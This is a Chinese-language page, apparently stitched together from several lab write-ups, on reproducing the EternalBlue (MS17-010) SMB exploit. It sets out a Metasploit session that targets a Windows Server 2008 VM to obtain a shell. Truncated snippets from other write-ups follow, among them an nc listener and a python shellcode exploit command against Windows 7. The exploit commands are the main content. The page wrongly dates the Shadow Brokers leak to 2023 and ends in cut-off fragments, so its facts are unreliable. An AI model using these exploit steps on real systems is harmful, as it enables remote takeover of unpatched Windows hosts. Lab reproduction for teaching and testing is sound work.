永恆之藍是2023年4月14日晚,黑客團體shadow brokers(影子經紀人)公布的一大批網路攻擊工具中的其中乙個。「永恆之藍」利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造「永恆之藍」製作了wannacry勒索病毒。
實驗一:獲取windows server 2008的shell
實驗環境:攻擊機:kali 靶機:windows server 2008
kali ip:192.168.3.129 win 2008 ip:192.168.3.128
root@kali:~# msfconsole
[-] ***rting the metasploit framework console.../
...msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set processname lsass.exe
processname => lsass.exe
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.3.129
lhost => 192.168.3.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.3.128
rhost => 192.168.3.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
永恆之藍ms17 010復現
使用工具 metasploit 一 環境準備 kali虛擬機器 二 metasploit簡介 metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和it專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智慧型開發 審計 web應...
ms17 010漏洞復現
很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....
MS17 010漏洞復現
實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...